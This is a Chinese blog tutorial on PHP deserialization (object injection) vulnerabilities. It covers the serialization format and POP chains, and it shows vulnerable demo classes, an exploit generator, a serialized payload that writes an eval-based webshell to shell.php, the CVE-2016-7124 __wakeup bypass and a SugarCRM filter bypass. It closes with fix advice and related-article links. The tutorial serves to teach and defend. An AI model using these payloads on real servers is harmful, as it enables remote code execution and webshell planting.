php反序列化绕过,【技术分享】PHP反序列化漏洞

最新推荐文章于 2022-08-02 09:06:27 发布
最新推荐文章于 2022-08-02 09:06:27 发布
阅读量460 收藏
点赞数
文章标签: php反序列化绕过

0c88cb668e759cac6066947cfa5e4f73.gif前言0c88cb668e759cac6066947cfa5e4f73.gif

序列化给我们传递对象提供了一种简单的方法serialize()将一个对象转换成一个字符串unserialize()将字符串还原为一个对象。此类函数的使用本身没有危害,但是传入反序列化函数的字符串用户可控的时候就会存在漏洞——PHP对象注入

0c88cb668e759cac6066947cfa5e4f73.gif正文0c88cb668e759cac6066947cfa5e4f73.gifPOP链

序列化的关键在于能够在目标代码当中找到一条可以控制的POP链,POP链就是class A调用了class B的方法,class B还调用了其他方法,在其方法中可以控制反序列化的参数,而class A中含有魔术方法引用了不安全的函数,就是一个POP链不同数据类型的序列化可以用来反序列化已被序列化的PHP变量

支持多种类型的PHP变量integers / floats / boolean

strings / array / objects

等...

booleanb:;

b:1; // True

b:0; // False

inti:;

i:1; // 1

i:-3; // -3

objectO:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}

NULLN; //NULL

strings:5:"hello";

s:size:value;

arraya:3:{s"key1";s"value1";s"value2";}

a:size:{key, value pairs};POP链demo

poc.php:<?php

class popdemo

{

private $data = "demo\n"; # 文件内容

private $filename = './demo'; # 目标文件

public function __wakeup() # 反序列化时触发

{

$this->save($this->filename);

}

public function save($filename) #写文件

{

file_put_contents($filename, $this->data);

}

}

以上为一个构造好的POP链,当用此类实例化的对象序列化之后再被反序列化,就会触发写文件操作

POC.php<?php

require "./popdemo.php";

$demo = new popdemo();

file_put_contents('./pop_serialized.txt', serialize($demo));

pop_unserialize.php

运行代码后,在当前目录下生成pop_serialized.txt文件,并且文件内存放着popdemo对象的序列化字符串

pop_unserialize.php<?php

require "./popdemo.php";

unserialize(file_get_contents('./pop_serialized.txt'));

运行pop_unserialize.php文件后,会在当前目录下生成一个demo文件,内容为demo

d3f6cda96a05e23257e7d9954ce7091a.png

250883be7514c6c9bce9af239187d753.png

cda98ef22b9fd3938ffd494033079615.png

9dfe1e92c10ef169f807ab7139244dd5.png

当我们能够控制序列化的字符串的时候,这个地方就会存在任意文件写操作的漏洞POP demo2

序列化漏洞利用方法不一定直接出现在魔术方法中如果关键代码不在魔术方法中时,而是在一个类的普通的方法中,这时候就需要寻找相同的函数名将类的属性和敏感函数的属性联系起来

blbana.php<?php

class blbana {

protected $ClassObj;

function __construct() {

$this->ClassObj = new normal();

}

function __destruct() {

$this->ClassObj->action();

}

}

class normal {

function action() {

echo "hello";

}

}

class evil {

private $data;

function action() {

eval($this->data);

}

}

unserialize($_GET['d']);

blbana这个类正常情况下,会在构造方法中实例化一个normal类的对象,在析构方法中会调用此对象的action方法,最终打印hello字符串,不存在敏感的操作

exp.php<?php

class blbana {

protected $ClassObj;

function __construct() {

$this->ClassObj = new evil();

}

}

class evil {

private $data = "phpinfo();";

}

echo urlencode(serialize(new blbana()));

echo "\n\r";%

运行exp.php生成payload,内容为:O%3A6%3A%22blbana%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A10%3A%22%00evil%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D

尝试攻击,将payload通过get请求传入到blbana.php的GET请求参数d里去

4149fff3dca6b43eb619bb35f9c1b113.png

成功调用了类evil中的action方法敏感的操作不一定要在魔术方法当中,当找到魔术方法以后,如果存在敏感操作,可以分析参数是否可控;当存在有敏感操作的普通方法时,就可以分析是否存在具有调用了同名方法的魔术方法,劫持代码的运行流程,触发漏洞代码漏洞代码

309fe44406ccdf005521fbc00f53fd97.png漏洞利用条件程序中有一个PHP的魔术方法,比如_wakeup或者_destruct,我们需要利用这个方法,来进行攻击;

程序中含有PHP反序列化的函数unserialize()

unserialize()参数可控,可以控制传入函数中的序列化字符串

此时我们的代码中已经具备了以上的条件,可以进行PHP的对象注入了。exp内容

O:3:"foo":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:4:"webshell";}

我们成功执行exp时,会在同一个目录下生成一个名叫shell.php的文件,并且文件内容为webshell漏洞利用

我们先通过上传之类的方法,将这个exp.txt上传到服务器当中,通过代码我们可以看出来,最后程序会将文件中的内容通过file_get_contents()函数读取出来,在程序执行完毕的时候,由于_destruct方法触发了代码执行。

0f642d5f9acc91413dc41612c3b1b3f5.png

597fdb127a81ecb5ae2dee49f458dada.png

在同级目录下生成了一个shell.php,且内容为aaaa漏洞分析

出现这个漏洞的时候我们可以利用它向目标服务器上写入shell:O:3:"foo":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:4:"<?php @eval($_GET['BlBana'])?>";}

通过这个exp,我们在shell.php写入的便是一句话。

需要注意的是,在字符串中,前面的数字代表的是后面字符串中字符的个数,如果数字与字符个数不匹配的话,就会报错,并向shell.php中写入初始内容“text”,我在不同版本的PHP中测试了这种错误。

7cd70978b549fd5964ea0b9aa85ff2fa.png

ae4fa51084524100cb099924602874cb.png

在以上这两个版本中测试的时候,若我们序列化后的字符串不符合要求,就会抛出一个错误,并向shell.php中写入初始值。

ebb8f9d152b51e91e1f67aa99406c065.png

c5ead2e00b8f8a2ad7dc4cc4acbfd93b.png

e1a37cbc8d9bc8b3f61db0e0c1506f84.png

但是在这个版本的PHP中,不会报错,但是依然是在shell.php中写入初始值。所以在利用的时候需要注意以上的内容,防止漏洞复现的失败有的程序当中,会在__destruct()方法调用之前,调用__wakeup()对成员变量的值进行赋值,导致我们exp在进入析构方法之前就被破坏掉,PHP 5.6.24中存在CVE漏洞CVE-2016-7124当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行

现在分析一下漏洞的一些细节,这是因为我们通过GET传递了参数给session_filename这个参数中,导致之后的函数file_get_contents读取了exp.txt中的字符串,之后字符串被反序列化为了foo的对象,导致了代码执行。

6afae80fb03dd9ee25b4f2bf00335799.png

被反序列后产生的对象,相当于我们利用new foo()成了一个对象:foo Object ( [file] => 2.txt [data] => text )

foo Object ( [file] => shell.php [data] => aaaa )

使得我们传入的恶意内容覆盖了原先对象初始值O:3:"foo":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:4:"aaaa";}

O:3:"foo":2:{s:4:"file";s:5:"2.txt";s:4:"data";s:4:"text";}

具体的序列化后的字符串如上所示。

我们成功的修改了变量$file和$data的值,这时候我们需要的是执行魔术方法_destruct(),这个方法的执行有以下集中方法:

1. 当程序正常的执行完毕后,所有的对象被销毁了,析构函数被调用(我们这里就是这种方法)

2. 当对象没有指向时,对象被销毁$p = new foo();

$p = null;

此时析构函数执行

3. 使用unset变量销毁指向对象的变量,注意的是unset销毁的是指向对象的变量,而不是对象,只有指向同一个对象的所有变量都销毁的时候,析构函数才执行。也就是说当对象被销毁时,析构函数就会被调用。

反序列化漏洞挖掘

反序列化漏洞的挖掘主要是在代码中找到可以利用的POP组件,具体思路:利用文本搜索工具,在目标代码中搜索,**__wakeup,__destruct**这类魔术方法

跟踪方法,看魔术方法中是否存在一些可以利用的地方,找到可以利用的POP组件

根据类的结构定义构建序列化字符串Poc0c88cb668e759cac6066947cfa5e4f73.gif总结0c88cb668e759cac6066947cfa5e4f73.gif漏洞修复对于传入unserialize()函数中的字符串,进行过滤,防止对象注入

避免在魔术方法中使用敏感的操作

避免存在敏感操作的普通方法和魔术方法中调用方法同名,从而被攻击者劫持代码流程,造成危害SugarCRM v6.5.23 --> v6.5.24 修复方法function sugar_unserialize($value)

{

6.5.23:preg_match('/[oc]:\d+:/i', $value, $matches); # O:+14:"SugarCacheFile"绕过

6.5.24:preg_mat ch('/[oc]:[^:]*\d+:/i', $value, $matches);

if (count($matches)) {

return false;

}

return unserialize($value);

}

luyingbb321
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP反序列化
qq_46430168的博客
07-02 1518
一.序列化和反序列化    1. 序列化(serialize):是将变量或对象转换成字符串的过程。从而达到传输和存储的目的。 class S { public $test=“pikachu”; } s=newS();//创建一个对象serialize(s=new S(); //创建一个对象 serialize(s=newS();//创建一个对象serialize(s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:“S”:1:{s:4:“tes
PHP反序列化题目记录
BaiScorpio的博客
06-20 852
最近跑去看了下PHP反序列化,发现比起java容易理解多了,主要是一些魔法函数相关反序列化、字符逃逸的反序列化、session反序列化、POP链反序列化和PHAR反序列化,以下将记录学习过程中的一些例题学习的过程。...
XCTF-攻防世界CTF平台-Web类——13、Web_php_unserialize(php反序列化漏洞绕过__wakeup()函数、正则表达式)
Onlyone_1314的博客
11-27 1133
打开题目地址: 这也是一个php反序列化的题目 源代码: <?php /** * 定义一个demo类 * / class Demo { # 初始化$file变量的默认值是index.php private $file = 'index.php'; # 类初始化的时候的构造函数,初始化当前对象的页面 public function __construct($file) { $this->file = $file; } # 对象销毁之前的析构函数,高
PHP反序列化漏洞基础
Jietewang的博客
12-06 826
前言 在开始之前首先要明白什么是反序列化?以及为什么要使用反序列化?说的深一点就是二进制序列和程序内部数据结构的转换,将信息按照一定格式二进制化,从而达到存储传输的目的。 说人话就是一个携带值的变量,只能存在于内存,当程序运行完成后,变量值就会从内存中清除,那序列化的目的就是把变量保存到硬盘中,在用到的时候方便调用。在PHP里序列化用在存储或传递PHP值的过程中,并且保证变量不丢失其类型和结构。 1. 序列化 在PHP中使用函数serialize()序列化对象和数组,并返回一个字符串,在使用seri
php class 创建实例,php 创建类实例的构造方法调用问题
weixin_28785657的博客
03-23 374
本文说的是php创建一个类的实例的时候,构造方法调用的问题。php中不像java一样,创建一个class的实例的时候 会自动的首先调用父类(超类)的构造方法,以确保所有的属性都可以被正确的初始化。php 不会在本类的构造方法中再自动的调用父类的构造方法。如果真的需要调用父类的构造方法,可以手动的调用parent::__construct($params...);class Base{functio...
深入浅析PHP的session反序列化漏洞问题
10-19
主要介绍了PHP的session反序列化漏洞问题,需要的朋友可以参考下
PHP反序列化漏洞.pdf
08-10
总的来说,PHP反序列化漏洞是一个复杂且危险的安全问题,开发者需要对对象的序列化和反序列化过程有深入理解,并采取合适的防护措施,以防止此类漏洞被攻击者利用。在编写和维护PHP代码时,应始终遵循最佳实践,进行...
PHP反序列化漏洞详解.rar
02-07
PHP反序列化漏洞通常是由于不安全地处理反序列化的数据导致的。当程序在反序列化对象时,可能会执行对象的方法,如果这些方法未经充分验证,就可能被恶意构造的数据所利用,执行任意代码,导致权限提升、数据泄露...
Shiro反序列化漏洞检测工具
01-05
反序列化不安全的对象时,攻击者可以构造特殊的序列化数据,使其在反序列化过程中调用预期的方法,从而执行恶意代码。 防范这种漏洞的方法主要有以下几点: 1. **升级Shiro版本**:确保Shiro框架的版本高于1.2.4...
php反序列漏洞 实例_浅析PHP反序列化漏洞的利用与审计
weixin_42510783的博客
03-09 381
0x00 前言首发在社区:Secin反序列化漏洞其实很多人都讲过了,正巧最近在某坛子上看到篇审计讲一个典型的PHP反序列化漏洞点,那么我就重新回顾下,主要是学习思路和个人理解,如果误区请指出,笔者感谢。0x01 PHP序列化与反序列化介绍PHP提供了两个对象序列化和反序列化的方法,分别是serialize()和unserialize()。从意义上理解,serialize()序列化的作用是产生一个可...
php反序列漏洞 实例_深入浅析PHP的session反序列化漏洞问题
weixin_34101577的博客
03-09 155
php.ini中存在三项配置项:session.save_path="" --设置session的存储路径session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动session.serializ...
php对象注入-pop链的构造
dengzhasong7076的博客
11-07 282
前言 反序列化可以控制类属性,无论是private还是public <?php class A { private $a = "a"; public $b = "b"; static $c = "c"; } $test = new A(); echo urlencode(serialize($test)); O%3A1%3A%22A%22%3A2%3A%7...
反序列化漏洞学习
weixin_64183637的博客
08-02 485
浅学反序列化
四个实例递进php反序列化漏洞理解
大方子
09-14 8073
索引 最近在总结php序列化相关的知识,看了好多前辈师傅的文章,决定对四个理解难度递进的序列化思路进行一个复现剖析。包括最近Blackhat议题披露的phar拓展php反序列化漏洞攻击面。前人栽树,后人乘凉,担着前辈师傅们的辅拓前行! D0g3 为了让大家进入状态,来一道简单的反序列化小题,新来的表哥们可以先学习一下php序列化和反序列化。顺便安利一下D0g3小组的平台...
php面试题之四——PHP面向对象(基础部分)
s1070的专栏
04-17 4198
1. 写出 php 的 public、protected、private 三种访问控制模式的区别(新浪网技术部) public:公有,任何地方都可以访问 protected:继承,只能在本类或子类中访问,在其它地方不允许访问 private:私有,只能在本类中访问,在其他地方不允许访问 相关题目:请写出 PHP5 权限控制修饰符 private protected publi
PHP Python 反序列化
今天的风儿甚是喧嚣
07-15 787
PHP 和 Python 的反序列化漏洞简述
CTF解题-2020年强网杯参赛WriteUp
道阻且长,行则将至。
08-29 8828
前言 2020年8月22日9:00 - 8月23日21:00,参加(划水)了历时36小时的第四届“强网杯”全国网络安全竞赛线上赛。 第一次参加CTF比赛,不可思议(成功傍大佬)地从1800+支队伍中以前10%的排名获得“优胜奖”(成功参与奖),故骄傲(厚脸皮)地记录下比赛wp…… 强网先锋 主动 1、进入网址,给出后台php源码,发现是个代码审计的题: 2、通过参数拼接命令,发现存在任意命令执行漏洞: 3、进一步查看本路径下的文件: 后台但是过滤了flag关键字,无法直接读取,那么就需要想办法绕过
php类受保护的区别,从另一个类PHP设置受保护变量的正确方法
weixin_33421065的博客
03-12 158
我有这个问题要解决:我创建了两个类,其中第二个是第一个的扩展,在这里我想设置并从第一堂课中获取一个变量,但是…我找不到做到这一点的“正确”方法基本上是这样的:class class_one {protected $value;private $obj_two;public function __construct() {$this->obj_two = new class_two;}publ...
深入解析PHP反序列化漏洞
在信息安全领域,PHP反序列化漏洞是一种常见的安全问题,它源于PHP的序列化和反序列化机制。首先,我们需要理解PHP中的类和对象的概念。类是编程中的一个核心概念,它是对具有相似特征或行为的事物的抽象,比如可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值